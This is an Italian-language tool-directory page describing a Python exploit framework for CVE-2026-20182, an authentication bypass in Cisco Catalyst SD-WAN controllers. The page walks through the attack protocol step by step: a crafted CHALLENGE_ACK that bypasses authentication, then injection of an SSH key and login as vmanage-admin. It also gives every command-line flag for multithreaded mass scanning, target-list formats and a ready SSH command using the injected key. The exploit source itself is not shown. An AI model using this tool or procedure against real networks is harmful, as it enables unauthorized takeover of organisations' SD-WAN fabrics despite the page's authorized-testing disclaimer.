Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20182 — Cisco Catalyst SD-WAN Bypass dell'autenticazione del peering | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-20182
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Cisco Catalyst SD-WAN Bypass dell'autenticazione del peering

Vedi Repository
122 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20182

Cisco Catalyst SD-WAN Peering Authentication Bypass

CVE-2026-20182 — Cisco Catalyst SD-WAN Peering Authentication Bypass

Strumento di valutazione per test autorizzati del bypass dell'autenticazione di peering di Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
GravitàCritica (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProdottoCisco Catalyst SD-WAN Controller (formerly vSmart) · Cisco Catalyst SD-WAN Manager (formerly vManage)
ProblemaMeccanismo di autenticazione di peering non applicato correttamente
ScriptCVE-2026-20182.py

Riepilogo della vulnerabilità

Avviso di maggio 2026: Una falla nell'handshake della connessione di controllo / autenticazione di peering consente a un attaccante remoto non autenticato di bypassare l'autenticazione e ottenere accesso interno ad alti privilegi sui sistemi interessati.

Un attaccante invia richieste appositamente predisposte al sistema interessato. In caso di successo, l'attaccante può autenticarsi come account interno, ad alti privilegi, non-root e raggiungere NETCONF, consentendo la manipolazione della configurazione del fabric SD-WAN.

Raccomandazione: Applicare le correzioni di sicurezza Cisco secondo le indicazioni ufficiali del fornitore. Limitare l'esposizione del management plane, monitorare le connessioni del control plane e verificare i controller SD-WAN per modifiche di configurazione non autorizzate.


Contatti

Telegram: @KNxploited


Anteprima della console

CVE-2026-20182 operations console


Strumento: CVE-2026-20182.py

Framework di exploit in Python 3 per CVE-2026-20182 contro Cisco SD-WAN vdaemon (UDP/DTLS 12346).

Cosa fa (passo per passo)

Fallback di fabric: In caso di TEAR_DOWN o disallineamento dei parametri, riprova con preset domain/site alternativi (1,100), (1,1), (0,0) a meno che non venga specificato --no-fallback.


Livelli dei risultati (leggere attentamente)

Importante

  • Modalità check → al massimo livello 03 (sonda di bypass). Non è prova completa di sfruttamento.
  • Modalità full → punta al livello 01 (ssh_verified).
  • https://host nell'elenco → solo indicazione web TCP (80/443). Non DTLS UDP su 443.

Requisiti

root@kitploit:~
pip install -r requirements.txt

OpenSSL (sistema)

Windows

  1. Installare Win64 OpenSSL 3.x o equivalente
  2. Aggiungere bin\ al PATH, oppure impostare:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

Lo strumento termina all'avvio se OpenSSL non può essere caricato.


Avvio rapido

Menu interattivo (predefinito)

root@kitploit:~
python CVE-2026-20182.py
  • Configurare le opzioni 1–11, poi 0 = AVVIA SCANSIONE
  • Modalità di esecuzione predefinita: check (sonda di bypass sicura)

Non interattivo (automazione)

root@kitploit:~
python CVE-2026-20182.py -y

Modalità di esecuzione

CHECK — solo sonda di bypass

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — inietta chiave + verifica SSH (solo target autorizzati)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

Riferimento CLI (ogni flag + esempio)

Target e worker

-f / --file — elenco dei target (predefinito: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — thread worker (1–200, predefinito 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID predefinito quando non presente nell'elenco (predefinito: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID predefinito quando non presente nell'elenco (predefinito: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Modalità e automazione

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — salta il menu interattivo; usa solo i valori CLI

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Verifica SSH

--no-ssh-verify — salta il test SSH post-iniezione (sconsigliato in modalità full)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — prova anche la TCP 22 dopo la 830

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / fabric

--no-try-list-udp — solo UDP 12346; ignora :port dall'elenco

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — lab: porte UDP extra su ogni host

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — disabilita il nuovo tentativo domain/site su TEAR_DOWN

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Registrazione log

-v / --verbose — registra ogni messaggio di protocollo TX/RX

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

Menu interattivo (quando -y è omesso)


Formato di targets.txt

Un target per riga. Le righe che iniziano con # vengono ignorate.

File di esempio

root@kitploit:~
# Lab controllers — authorized only
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

Non supportato: IPv6 (solo IPv4 / hostname).


File di output

Esempio di comando SSH (livello 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

Flussi di lavoro consigliati

1) Screening di molti host (veloce)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

Esaminare cisco_sdwan_03_bypass_only.jsonl e le statistiche live Solo bypass.

2) Confermare l'exploit sugli host selezionati

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

Esaminare cisco_sdwan_01_confirmed_ssh.jsonl — unico file con ssh_verified: true.

3) Debug di un singolo host (verbose)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

Telemetria live (durante la scansione)


Note operative

  • La modalità predefinita è check — non scrive chiavi né prova SSH da sola.
  • Successo reale = ssh_verified=true solo in modalità full.
  • Fabric patchato / errato → spesso TEAR_DOWN dopo CHALLENGE_ACK; abilitare il fallback di fabric o correggere domain/site nell'elenco.
  • Il firewall deve consentire UDP/12346 (ed eventuali porte UDP extra dell'elenco) dallo scanner al controller.
  • Non committare sdwan_keys/ né i risultati delle scansioni in repository pubblici.

Disclaimer legale

Questo software è destinato esclusivamente a ricerca sulla sicurezza autorizzata, valutazione difensiva e formazione.

È necessario disporre di autorizzazione scritta esplicita per testare qualsiasi sistema che non si possiede o si gestisce. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non è responsabile di usi impropri, danni o conseguenze legali derivanti dall'uso di questo strumento.

Utilizzare solo su sistemi e reti in cui si dispone di esplicita autorizzazione a eseguire test di sicurezza.


By: Nxploited ( Khaled Alenazi )

Scarica lo strumento
ElementoDettaglio
Vettore di attaccoRete
Privilegi richiestiNessuno
Interazione con l'utenteNessuna
AmbitoModificato
ImpattoRiservatezza, integrità e disponibilità — Alta
PassoFaseDescrizione
1Carica i targetAnalizza targets.txt, unisce i duplicati per (host, domain_id, site_id)
2Preflight OpenSSLCarica le librerie condivise OpenSSL 3.x/4.x per DTLS personalizzato
3Connessione DTLSSi connette alla porta UDP del target (sempre 12346 per prima, poi le porte opzionali dell'elenco)
4CHALLENGERiceve CHALLENGE (0x08) dal server
5CHALLENGE_ACKInvia CHALLENGE_ACK appositamente predisposto come vHub (tipo 2) — bypass dell'autenticazione
6HelloCompleta lo scambio Hello — conferma il percorso di bypass
7aModalità CHECKFermati qui — registra solo bypass / Hello OK (niente chiavi, niente SSH)
7bModalità FULLInietta la chiave pubblica SSH tramite VMANAGE_TO_PEER
8Inject ACKAttende REGISTER_TO_VMANAGE (0x0D) come conferma del protocollo
9Verifica SSHVerifica il login come vmanage-admin su TCP 830 (NETCONF), opzionalmente 22
10OutputOrdina i risultati in file a livelli + elenco di comandi leggibile
LivelloFileSignificato
01 — SSH confermatocisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — unico livello considerato prova completa di compromissione
02 — Solo Inject ACKcisco_sdwan_02_inject_ack_only.jsonlIl protocollo ha accettato l'iniezione della chiave; login SSH fallito
03 — Solo bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass OK; nessuna iniezione confermata
RequisitoNote
Python3.9+
pipcryptography, rich
OpenSSLlibrerie condivise 3.x o 4.x (libssl + libcrypto) — obbligatorie
ModalitàFlagIniezione SSHVerifica SSHQuando usarla
CHECK--mode check (predefinita)NoNoScreening di massa, rilevamento bypass
FULL--mode fullSìSì (tranne con --no-ssh-verify)Prova di compromissione
#Opzione
1File dei target
2Thread worker
3DOMAIN_ID predefinito
4SITE_ID predefinito
5Modalità: check / full
6Nuovo tentativo automatico di fabric su TEAR_DOWN
7Log di protocollo dettagliato
8Verifica SSH dopo l'iniezione
9Verifica anche SSH :22
10Prova le porte UDP esplicite dell'elenco
11Porte UDP extra (lab)
12Mostra aiuto sul formato dell'elenco
0▶ AVVIA SCANSIONE
FormatoEsempioComportamento
IP / hostname10.0.0.1UDP 12346 + domain/site predefiniti
IP + porta UDP10.0.0.2:12346Prova anche la porta UDP dell'elenco
IP + porta + domain + site10.0.0.3:12346:1:100Tupla fabric completa
URL HTTPShttps://10.0.0.4Host + solo indicazione TCP 443 (non UDP/443)
URL HTTPhttp://10.0.0.5solo indicazione TCP 80
URL UDPudp://10.0.0.6:12346UDP esplicito
Separati da tab/virgola10.0.0.7 12346 1 100Come la forma a quattro campi
Chiave=valore10.0.0.8;port=12346;domain=1;site=100Sintassi KV con punto e virgola
FileContenuto
cisco_sdwan_results.jsonlRisultato JSON grezzo per tentativo
cisco_sdwan_success.txtRighe SSH confermate (separate da tab)
cisco_sdwan_01_confirmed_ssh.jsonlLivello 01 — SSH verificato
cisco_sdwan_02_inject_ack_only.jsonlLivello 02 — inject ACK, SSH fallito
cisco_sdwan_03_bypass_only.jsonlLivello 03 — solo bypass / Hello
cisco_sdwan_commands.txtComandi SSH leggibili
cisco_sdwan_findings.jsonRiepilogo della sessione + conteggi
sdwan_keys/Chiavi private generate (modalità full)
ContatoreSignificato
AvanzamentoTarget completati / totale
SSH verificatiConteggio livello 01
Inject ACKConteggio livello 02
Solo bypassConteggio livello 03
FallitiErrori / nessun bypass